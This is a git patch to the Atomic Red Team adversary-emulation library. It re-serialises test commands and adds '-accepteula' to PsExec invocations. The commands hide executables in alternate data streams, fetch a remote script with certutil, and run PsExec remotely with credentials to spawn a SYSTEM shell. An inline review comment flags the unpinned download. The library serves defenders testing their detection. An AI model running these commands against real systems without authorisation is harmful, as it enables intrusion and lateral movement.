From 979befcf8a9c83cf80aac2900db7c026a41df989 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 20 Jul 2020 17:44:44 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/Indexes/index.yaml | 28 +++++++++++++-----------------
 atomics/T1021.002/T1021.002.md | 2 +-
 atomics/T1021.006/T1021.006.md | 2 +-
 atomics/T1569.002/T1569.002.md | 2 +-
 4 files changed, 16 insertions(+), 18 deletions(-)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 614cd113..2baed0ae 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -27100,17 +27100,15 @@ defense-evasion:
 type: path
 default: c:\ADS\
 executor:
- command: |
- type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
- extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
- findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
- certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\temp:ttt
- makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
- print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
- reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
- regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
- expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
- esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
+ command: "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32
+ #{path}\\procexp.cab #{path}\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump
+ #{path}\\procexp.exe > #{path}\\file.txt:procexp.exe\ncertutil.exe -urlcache
+ -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1
+ c:\\temp:ttt\nmakecab #{path}\\autoruns.exe #{path}\\cabtest.txt:autoruns.cab\nprint
+ /D:#{path}\\file.txt:autoruns.exe #{path}\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg
+ #{path}\\file.txt:evilreg.reg\nregedit /E #{path}\\file.txt:regfile.reg
+ HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat #{path}\\file.txt:file.bat\nesentutl.exe
+ /y #{path}\\autoruns.exe /d #{path}\\file.txt:autoruns.exe /o \n"
 name: command_prompt
 elevation_required: true
 - name: Store file in Alternate Data Stream (ADS)
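Review bot: The re-serialized command in this hunk still fetches `test.ps1` from the mutable `master` branch (`certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\temp:ttt`), so what the T1564.004 ADS test actually writes to disk can change with no commit to the consuming repo; pin the URL to a commit SHA or reference the file already shipped under `src/` via a path input argument. Since `index.yaml` is generated, that fix belongs in the source atomic, presumably `atomics/T1564.004/T1564.004.yaml`. Separately, the generator turned the `command: |` literal block into a folded double-quoted scalar, which makes the ten embedded commands much harder to audit in review and preserves a stray trailing space before the final `\n` in `/o \n`; keeping a `|` block in the source YAML would round-trip more readably. `certutil -urlcache` is also believed to leave a copy of the fetched file in the per-user URL cache, which the test's cleanup (outside this hunk, if any) should account for — confirm against the source atomic.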
@@ -40673,7 +40671,7 @@ execution:
 New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
 Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
 executor:
- command: '#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
+ command: '#{psexec_exe} \\#{remote_host} -accepteula "C:\Windows\System32\calc.exe"
 '
 name: powershell
@@ -42393,7 +42391,7 @@ lateral-movement:
 type: String
 default: "\\\\localhost"
 executor:
- command: 'psexec.exe #{remote_host} -c #{command_path}
+ command: 'psexec.exe #{remote_host} -accepteula -c #{command_path}
 '
 name: command_prompt
@@ -43011,8 +43009,8 @@ lateral-movement:
 New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
 Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
 executor:
- command: "#{psexec_exe} \\\\#{computer_name} -u #{user_name} -p #{password}
- -s cmd.exe\n"
+ command: "#{psexec_exe} \\\\#{computer_name} -accepteula -u #{user_name} -p
+ #{password} -s cmd.exe\n"
 name: command_prompt
 - name: Invoke-Command
 auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
diff --git a/atomics/T1021.002/T1021.002.md b/atomics/T1021.002/T1021.002.md
index 1a2160f8..b5574c34 100644
--- a/atomics/T1021.002/T1021.002.md
+++ b/atomics/T1021.002/T1021.002.md
@@ -101,7 +101,7 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
 ```cmd
-psexec.exe #{remote_host} -c #{command_path}
+psexec.exe #{remote_host} -accepteula -c #{command_path}
 ```
diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md
index 9228f365..2944958f 100644
--- a/atomics/T1021.006/T1021.006.md
+++ b/atomics/T1021.006/T1021.006.md
@@ -138,7 +138,7 @@ Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a rem
 ```cmd
-#{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
+#{psexec_exe} \\#{computer_name} -accepteula -u #{user_name} -p #{password} -s cmd.exe
 ```
diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md
index 9b9feffc..1a12568e 100644
--- a/atomics/T1569.002/T1569.002.md
+++ b/atomics/T1569.002/T1569.002.md
@@ -75,7 +75,7 @@ Upon successful execution, powershell will download psexec.exe and spawn calc.ex
 ```powershell
-#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
+#{psexec_exe} \\#{remote_host} -accepteula "C:\Windows\System32\calc.exe"
 ```